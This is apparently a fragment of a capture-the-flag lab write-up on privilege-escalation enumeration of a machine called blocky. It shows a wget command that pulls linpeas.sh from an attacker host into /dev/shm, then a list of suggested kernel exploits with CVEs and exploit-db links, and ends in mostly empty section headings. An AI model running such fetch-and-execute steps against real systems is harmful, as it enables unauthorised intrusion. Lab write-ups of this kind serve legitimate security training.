PEAS


notch@blocky:/dev/shm$ wget -q http://10.10.14.17/linpeas.sh ; chmod 755 /dev/shm/linpeas.sh

Delivery complete

Executing PEAS

$PATH


CVEs


╔══════════╣ Executing Linux Exploit Suggester 2
 https://github.com/jondonas/linux-exploit-suggester-2
  [1] af_packet
      CVE-2016-8655
      source: http://www.exploit-db.com/exploits/40871
  [2] exploit_x
      CVE-2018-14665
      source: http://www.exploit-db.com/exploits/45697
  [3] get_rekt
      CVE-2017-16695
      source: http://www.exploit-db.com/exploits/45010

Containers


Cron


PEAS also picked up the cronjob

Services


Networks


Networks

Membership


Group membership of the current user; notch

pkexec


Web


SUIDs


Unexpected in root


Modified in the last 5mins